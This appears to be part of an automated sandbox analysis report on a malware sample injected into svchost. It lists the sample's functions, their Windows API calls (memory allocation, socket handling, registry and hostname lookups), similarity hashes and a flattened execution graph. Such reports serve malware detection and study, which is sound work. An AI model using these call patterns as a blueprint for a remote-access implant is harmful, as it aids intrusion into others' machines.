                                                                                                                • API ID: Alloc$Virtual$Heap$Processmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 2335822491-0
                                                                                                                • Opcode ID: e49d25e9bb0d4a180f47fe763da8cbfb8d19a32eb96c44da1c7ada0cf7328320
                                                                                                                • Instruction ID: eacb235572be496481c28daf470fd61b07f9ecf460b9dfe0afcc7509c1ddb230
                                                                                                                • Opcode Fuzzy Hash: e49d25e9bb0d4a180f47fe763da8cbfb8d19a32eb96c44da1c7ada0cf7328320
                                                                                                                • Instruction Fuzzy Hash: 88314A71600701AFE715CFA9CD85E6BBBECEF49794F118029F644DB285D7B0E9408BA4
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038D8
                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038E8
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000014,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C), ref: 100038F9
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C,?), ref: 10003900
                                                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003924
                                                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003933
                                                                                                                • memcpy.MSVCRT(00000000,?,?,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?), ref: 10003944
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Alloc$Virtual$Heap$Processmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 2335822491-0
                                                                                                                • Opcode ID: 9aa3b273a59eb2c0b2545a37afc38cd619bd195e7d1346904624c1b6da4ac45c
                                                                                                                • Instruction ID: 10317215f663cfab710d715b633d7b0dbc04a231647ffe3f91967b0172577e13
                                                                                                                • Opcode Fuzzy Hash: 9aa3b273a59eb2c0b2545a37afc38cd619bd195e7d1346904624c1b6da4ac45c
                                                                                                                • Instruction Fuzzy Hash: 69317A71600701AFEB15CBA8CD85F6BBBECEF49794F108029F645DB285D7B0E8008B64
                                                                                                                APIs
                                                                                                                • ceil.MSVCRT ref: 10001226
                                                                                                                • _ftol.MSVCRT ref: 1000122E
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,?,?,10001712,00000003), ref: 10001251
                                                                                                                • memcpy.MSVCRT(00000000,?,00000000,?,?,10001712,00000003), ref: 10001275
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,10001712,00000003), ref: 10001287
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$AllocFree_ftolceilmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3927456183-0
                                                                                                                • Opcode ID: f94edee6810ba8cea6bfb4746a43b2bc9bf2551bc4d63573e388d815a9760473
                                                                                                                • Instruction ID: ff1c2b162e375ad2b81c3d4b25a5517a05f38efa8821d55832f31a3c03b13b4e
                                                                                                                • Opcode Fuzzy Hash: f94edee6810ba8cea6bfb4746a43b2bc9bf2551bc4d63573e388d815a9760473
                                                                                                                • Instruction Fuzzy Hash: 3A11C1B1700304ABF7549F65CC86B9FBBE9EB447D1F108429F655C6284DA71A8008760
                                                                                                                APIs
                                                                                                                • ceil.MSVCRT ref: 10001187
                                                                                                                • _ftol.MSVCRT ref: 1000118F
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,?,?,10001947,?,00000003,?,00000144), ref: 100011A3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual_ftolceil
                                                                                                                • String ID:
                                                                                                                • API String ID: 3317677364-0
                                                                                                                • Opcode ID: 7f57421f4e8a0dbe28e4ec1d2025382d16bc9b97be7dafbce8d036dedad50421
                                                                                                                • Instruction ID: 1b5d6cedb6f753cdbab920be1aa23ddc9916300482f626f48fbf4534a1b153b9
                                                                                                                • Opcode Fuzzy Hash: 7f57421f4e8a0dbe28e4ec1d2025382d16bc9b97be7dafbce8d036dedad50421
                                                                                                                • Instruction Fuzzy Hash: 29119EB1700700ABF7189F65CC85BDFBAE8EB447D1F10842DFB4AC6694EAB5E8008764
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 100013BB
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,?,10002F56), ref: 100013DD
                                                                                                                • CloseHandle.KERNEL32(?,?,10002F56), ref: 100013F3
                                                                                                                • CloseHandle.KERNEL32(?,?,10002F56), ref: 100013FC
                                                                                                                • WSACleanup.WS2_32 ref: 10001402
                                                                                                                  • Part of subcall function 1000180A: setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 1000182F
                                                                                                                  • Part of subcall function 1000180A: CancelIo.KERNEL32(?,?,10001455,00002081,00000000), ref: 10001838
                                                                                                                  • Part of subcall function 1000180A: InterlockedExchange.KERNEL32(?,00000000), ref: 10001844
                                                                                                                  • Part of subcall function 1000180A: closesocket.WS2_32(?), ref: 1000184D
                                                                                                                  • Part of subcall function 1000180A: SetEvent.KERNEL32(?,?,10001455,00002081,00000000), ref: 10001856
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$CancelCleanupEventExchangeH_prologInterlockedObjectSingleWaitclosesocketsetsockopt
                                                                                                                • String ID:
                                                                                                                • API String ID: 1476891362-0
                                                                                                                • Opcode ID: 22c76b733420cd5322f8b44b49fa99b01b9ed644fac333f7b406b2753b621805
                                                                                                                • Instruction ID: 3d7d7f28339fdf93618245a95348ecc54ac045937f8d7f2223a7296bdd3ad800
                                                                                                                • Opcode Fuzzy Hash: 22c76b733420cd5322f8b44b49fa99b01b9ed644fac333f7b406b2753b621805
                                                                                                                • Instruction Fuzzy Hash: C801A934812BA1DFE725DB64CA4979EBBF5EF047D0F20465CE0A3525EACBB16A04CB11
                                                                                                                APIs
                                                                                                                • setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 1000182F
                                                                                                                • CancelIo.KERNEL32(?,?,10001455,00002081,00000000), ref: 10001838
                                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 10001844
                                                                                                                • closesocket.WS2_32(?), ref: 1000184D
                                                                                                                • SetEvent.KERNEL32(?,?,10001455,00002081,00000000), ref: 10001856
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                                • String ID:
                                                                                                                • API String ID: 1486965892-0
                                                                                                                • Opcode ID: 1871585578dca608de80bf68f21ac6b78937bcf90260c740f92b3d4c82ad3011
                                                                                                                • Instruction ID: db2c71347286e861532d4f6efb444a5e96e0316710033133ccac3d22043cdb64
                                                                                                                • Opcode Fuzzy Hash: 1871585578dca608de80bf68f21ac6b78937bcf90260c740f92b3d4c82ad3011
                                                                                                                • Instruction Fuzzy Hash: 12F05E31000729EFEB209B95CC4EE9A7BB9FF08364F204528F382915F4DBB3A9449B50
                                                                                                                APIs
                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10004307
                                                                                                                • _beginthreadex.MSVCRT ref: 10004325
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10004335
                                                                                                                • CloseHandle.KERNEL32(?), ref: 1000433E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateEventHandleObjectSingleWait_beginthreadex
                                                                                                                • String ID:
                                                                                                                • API String ID: 92035984-0
                                                                                                                • Opcode ID: 4f24713aeb18b6c8055081ae489e524b02219a3e0fa4e6869f4180a6eb22546b
                                                                                                                • Instruction ID: faf95892778ea6415a1c54bed7ea38c560d5af97f962d2801ede21c28746a2bf
                                                                                                                • Opcode Fuzzy Hash: 4f24713aeb18b6c8055081ae489e524b02219a3e0fa4e6869f4180a6eb22546b
                                                                                                                • Instruction Fuzzy Hash: 93F097B1900119FFEF019FA8CC498AE7BB9FB08351B504565FD25E2264D7329A209B90
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 10004857
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 1000486A
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 10004878
                                                                                                                  • Part of subcall function 10004822: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004885
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                                                  • Part of subcall function 10004822: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004A63
                                                                                                                • lstrlenA.KERNEL32(00000014,?,?,?,?,100037FD,?,00000014,?), ref: 10003650
                                                                                                                • lstrcpyA.KERNEL32(00000014,Error,?,?,?,?,100037FD,?,00000014,?), ref: 10003662
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$memset$Library$FreeLoadlstrcpylstrlen
                                                                                                                • String ID: Error$InstallTime
                                                                                                                • API String ID: 2132864188-3993312925
                                                                                                                • Opcode ID: 05b9f159da249184b1e3b095e130b72a17f690af3a1cf10b62a6d9e74dba2db9
                                                                                                                • Instruction ID: e8fad5b45eeb662e546af45f25a3999bf1724c4d36ffe5c36dea95d3d4dec653
                                                                                                                • Opcode Fuzzy Hash: 05b9f159da249184b1e3b095e130b72a17f690af3a1cf10b62a6d9e74dba2db9
                                                                                                                • Instruction Fuzzy Hash: 9DE0BF31140648B7FF115F51CC46F9D3B5AEB187D6F108054FB08680A4DB7396A09789
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 10004857
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 1000486A
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 10004878
                                                                                                                  • Part of subcall function 10004822: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004885
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                                                  • Part of subcall function 10004822: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004A63
                                                                                                                • lstrlenA.KERNEL32(?,?,1000377E,?,00000032,?,?,?,00000004), ref: 10003611
                                                                                                                • gethostname.WS2_32(?,?), ref: 10003621
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$memset$Library$FreeLoadgethostnamelstrlen
                                                                                                                • String ID: Remark
                                                                                                                • API String ID: 619171837-3865500943
                                                                                                                • Opcode ID: 83dbbab8dfa45e9539ae4d59c493a246dad8b5cf60af1f24285e8dd54035da6b
                                                                                                                • Instruction ID: 39b077b3adc2da00c1cb4508d3157ec8a6411d10b118cb0f162994d28e94cfda
                                                                                                                • Opcode Fuzzy Hash: 83dbbab8dfa45e9539ae4d59c493a246dad8b5cf60af1f24285e8dd54035da6b
                                                                                                                • Instruction Fuzzy Hash: BDE0B635240219BBEF125F91CC46F9E3F2AEB087D1F108014FB18681A5DB739660AB89
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,?), ref: 10003A10
                                                                                                                • memset.MSVCRT ref: 10003A1B
                                                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,?), ref: 10003A31
                                                                                                                • memcpy.MSVCRT(00000000,?,?), ref: 10003A40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual$memcpymemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2542864682-0
                                                                                                                • Opcode ID: a05ca4ebf277b10faf3ccce4336dd2b651ae8b873c4573ed6e3e9fab059df227
                                                                                                                • Instruction ID: 4a5287acb012e3640f8314301f41164344c56cf0a301795e67bafcb82fb77477
                                                                                                                • Opcode Fuzzy Hash: a05ca4ebf277b10faf3ccce4336dd2b651ae8b873c4573ed6e3e9fab059df227
                                                                                                                • Instruction Fuzzy Hash: 82213871A00208AFEB11CF59CC81F9AB7F8FF44344F118459E9809B251D770AA50CB54

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:12.5%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:19.3%
                                                                                                                Total number of Nodes:673
                                                                                                                Total number of Limit Nodes:13
RtlWow64IsWowGuestMachineSupported 2252->2254 2255 e13b56 2252->2255 2253 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2257 e13b9f 2253->2257 2258 e13bb3 2254->2258 2254->2264 2256 e13b60 GetSystemDirectoryW 2255->2256 2255->2264 2259 e13b72 2256->2259 2257->2226 2257->2234 2260 e13bbc GetSystemWow64Directory2W 2258->2260 2258->2264 2261 e13b76 PathCchAppend 2259->2261 2259->2264 2260->2259 2262 e13bd1 Wow64EnableWow64FsRedirection memset GetCommandLineW CreateProcessW Wow64EnableWow64FsRedirection 2261->2262 2261->2264 2263 e13c2e WaitForSingleObject CloseHandle CloseHandle 2262->2263 2262->2264 2263->2264 2264->2253 2266 e13af9 2265->2266 2267 e13a88 memset ReadFile 2265->2267 2268 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2266->2268 2269 e13ab0 2267->2269 2270 e13af2 CloseHandle 2267->2270 2272 e13b07 2268->2272 2269->2270 2271 e13abb SetFilePointer 2269->2271 2270->2266 2271->2270 2273 e13acc ReadFile 2271->2273 2272->2251 2272->2264 2273->2270 2274 e13aeb 2273->2274 2274->2270 2276 e1207c CreateEventW 2275->2276 2276->2173 2276->2177 2277->2179 2279 e14d5f 2278->2279 2286 e14dea 2279->2286 2294 e164a6 2279->2294 2281 e14dab 2282 e164a6 2 API calls 2281->2282 2283 e14dc9 2282->2283 2284 e164a6 2 API calls 2283->2284 2284->2286 2285 e164a6 2 API calls 2287 e14fbd 2285->2287 2286->2285 2286->2287 2287->2181 2289 e135a6 2288->2289 2290 e164a6 2 API calls 2289->2290 2293 e135f1 2289->2293 2290->2293 2302 e13306 2293->2302 2295 e163b2 __EH_prolog3_catch 2294->2295 2298 e16aca 2295->2298 2297 e163ca 2297->2281 2299 e16adf malloc 2298->2299 2300 e16ad2 _callnewh 2299->2300 2301 e16aee 2299->2301 2300->2299 2300->2301 2301->2297 2305 e13320 2302->2305 2303 e133d8 2303->2184 2304 e1337e AcquireSRWLockExclusive 2304->2305 2305->2303 2305->2304 2306 e13399 ReleaseSRWLockExclusive 2305->2306 2307 e133b3 DecodePointer 2305->2307 2308 e133a9 ReleaseSRWLockExclusive 2305->2308 2306->2305 2307->2305 2308->2307 2310 e11f94 2309->2310 2311 
e11fb6 2310->2311 2313 e1201a _vsnwprintf 2310->2313 2311->2190 2311->2196 2314 e1203e 2313->2314 2314->2311 2599 e124a7 2600 e124be 2599->2600 2601 e124af 2599->2601 2603 e123be 2601->2603 2604 e123f1 GetModuleHandleExW 2603->2604 2605 e1240d 2603->2605 2604->2605 2609 e12405 2604->2609 2606 e1242d GetModuleFileNameA 2605->2606 2605->2609 2606->2609 2607 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2608 e12493 2607->2608 2608->2600 2609->2607 2610 e160a6 _XcptFilter 2611 e11e30 2614 e153ad InitOnceExecuteOnce 2611->2614 2613 e11e35 2614->2613 2615 e11db5 2616 e16483 4 API calls 2615->2616 2617 e11dba 2616->2617 2618 e148b7 2619 e14979 2618->2619 2620 e148cf 2618->2620 2620->2619 2621 e14b58 12 API calls 2620->2621 2622 e14903 2621->2622 2623 e1496c 2622->2623 2624 e146ca 15 API calls 2622->2624 2623->2619 2626 e12a77 13 API calls 2623->2626 2625 e14917 2624->2625 2627 e146ca 15 API calls 2625->2627 2626->2619 2628 e14920 2627->2628 2629 e14925 GetLastError 2628->2629 2630 e1493f 2628->2630 2631 e12a77 13 API calls 2629->2631 2632 e14b03 6 API calls 2630->2632 2633 e14935 SetLastError 2631->2633 2634 e14947 2632->2634 2633->2630 2635 e149b2 13 API calls 2634->2635 2636 e1494e 2635->2636 2637 e1495b GetProcessHeap HeapFree 2636->2637 2638 e12a52 13 API calls 2636->2638 2637->2623 2638->2637 2639 e160ba 2640 e160d5 2639->2640 2641 e160ce _exit 2639->2641 2642 e160de _cexit 2640->2642 2643 e160e9 2640->2643 2641->2640 2642->2643 2644 e1693a 2645 e168f5 2644->2645 2645->2644 2647 e15e4f LdrResolveDelayLoadedAPI 2645->2647 2647->2645 2653 e15e80 2654 e15e85 2653->2654 2662 e16598 GetModuleHandleW 2654->2662 2656 e15e91 __set_app_type __p__fmode __p__commode 2657 e15ec9 2656->2657 2658 e15ed2 __setusermatherr 2657->2658 2659 e15ede 2657->2659 2658->2659 2664 e167cd _controlfp 2659->2664 2661 e15ee3 2663 e165a9 2662->2663 2663->2656 2664->2661 2665 e15400 2666 e15423 2665->2666 2667 e15414 RoOriginateError 2665->2667 2668 e154a1 3 API calls 2666->2668 
2669 e1542e 2667->2669 2668->2669 2670 e13200 2671 e1320d 2670->2671 2672 e1322a 2670->2672 2673 e131df GetModuleHandleW 2671->2673 2674 e13217 GetProcAddress 2673->2674 2674->2672 2675 e13180 2683 e130bc 2675->2683 2678 e131a1 2679 e131ca 2678->2679 2688 e12f81 2678->2688 2684 e130df GetCurrentThreadId 2683->2684 2685 e130f8 2683->2685 2684->2685 2687 e1311f GetCurrentThreadId 2685->2687 2700 e13004 2685->2700 2687->2678 2687->2679 2689 e12f98 2688->2689 2693 e12fdc 2688->2693 2690 e12faa 2689->2690 2704 e14751 GetCurrentProcessId 2689->2704 2691 e12fc7 GetCurrentThreadId 2690->2691 2690->2693 2691->2693 2693->2679 2694 e12ebd 2693->2694 2695 e12ed4 2694->2695 2696 e12ee9 2694->2696 2697 e12f7a 2695->2697 2699 e1230b 3 API calls 2695->2699 2696->2697 2809 e12d48 2696->2809 2697->2679 2699->2696 2701 e130b3 2700->2701 2702 e13024 2700->2702 2701->2687 2702->2701 2702->2702 2703 e1309f memcpy_s 2702->2703 2703->2701 2705 e11f86 _vsnwprintf 2704->2705 2706 e1478e CreateMutexExW 2705->2706 2707 e146ca 15 API calls 2706->2707 2708 e147b7 2707->2708 2709 e147cb 2708->2709 2710 e147bf 2708->2710 2712 e14b58 12 API calls 2709->2712 2730 e12553 2710->2730 2714 e147e1 2712->2714 2713 e147c4 2717 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2713->2717 2733 e12c6f 2714->2733 2719 e1488c 2717->2719 2718 e14815 2721 e129db 11 API calls 2718->2721 2722 e14832 2718->2722 2719->2690 2721->2722 2725 e1483f 2722->2725 2726 e1484a 2722->2726 2751 e149d3 2722->2751 2723 e129db 11 API calls 2723->2726 2725->2723 2725->2726 2727 e1486a 2726->2727 2728 e12a77 13 API calls 2726->2728 2727->2713 2729 e12a52 13 API calls 2727->2729 2728->2727 2729->2713 2731 e1251b 12 API calls 2730->2731 2732 e12568 2731->2732 2732->2713 2734 e12cad 2733->2734 2735 e12cbb OpenSemaphoreW 2734->2735 2736 e12cd2 GetLastError 2735->2736 2737 e12cef 2735->2737 2738 e12ceb 2736->2738 2739 e12cdd 2736->2739 2773 e12b5a WaitForSingleObject 2737->2773 2741 e12d2f 2738->2741 2744 e12a52 13 API calls 
2738->2744 2770 e129fa 2739->2770 2745 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2741->2745 2744->2741 2746 e12d42 2745->2746 2746->2718 2748 e129db 2746->2748 2747 e129db 11 API calls 2747->2738 2749 e12916 11 API calls 2748->2749 2750 e129f6 2749->2750 2750->2718 2793 e1230b GetProcessHeap HeapAlloc 2751->2793 2754 e14a03 2756 e129db 11 API calls 2754->2756 2755 e14a1c 2757 e14afd 2755->2757 2796 e12a9c 2755->2796 2758 e14a17 2756->2758 2758->2725 2761 e14a60 memset 2764 e14a52 2761->2764 2762 e14a43 2763 e129db 11 API calls 2762->2763 2763->2764 2765 e14ad4 2764->2765 2766 e12a52 13 API calls 2764->2766 2767 e14ade 2765->2767 2769 e12a52 13 API calls 2765->2769 2766->2765 2767->2758 2768 e14ae2 GetProcessHeap HeapFree 2767->2768 2768->2758 2769->2767 2788 e1298e 2770->2788 2774 e12b8b 2773->2774 2787 e12b78 2773->2787 2776 e12b96 2774->2776 2777 e12be4 ReleaseSemaphore 2774->2777 2778 e12ba7 ReleaseSemaphore 2774->2778 2775 e129fa 12 API calls 2785 e12b86 2775->2785 2782 e129db 11 API calls 2776->2782 2776->2785 2780 e12c02 2777->2780 2777->2787 2779 e12bbf ReleaseSemaphore 2778->2779 2778->2787 2779->2776 2783 e12bd0 GetLastError 2779->2783 2780->2776 2781 e12c0e ReleaseSemaphore 2780->2781 2781->2776 2784 e12c1c GetLastError 2781->2784 2782->2785 2783->2776 2783->2785 2784->2776 2786 e12c29 WaitForSingleObject 2784->2786 2785->2738 2785->2747 2786->2776 2786->2787 2787->2775 2789 e1251b 12 API calls 2788->2789 2790 e129a9 2789->2790 2791 e12843 11 API calls 2790->2791 2792 e129d2 2791->2792 2792->2738 2794 e1233f 2793->2794 2795 e12328 GetProcessHeap 2793->2795 2794->2754 2794->2755 2795->2794 2797 e12b54 2796->2797 2798 e12ac9 2796->2798 2799 e12afd CreateSemaphoreExW 2798->2799 2800 e12b23 2799->2800 2801 e12b19 2799->2801 2802 e12553 12 API calls 2800->2802 2803 e146ca 15 API calls 2801->2803 2804 e12b21 2802->2804 2803->2804 2805 e129db 11 API calls 2804->2805 2806 e12b3d 2804->2806 2805->2806 2807 e161b0 
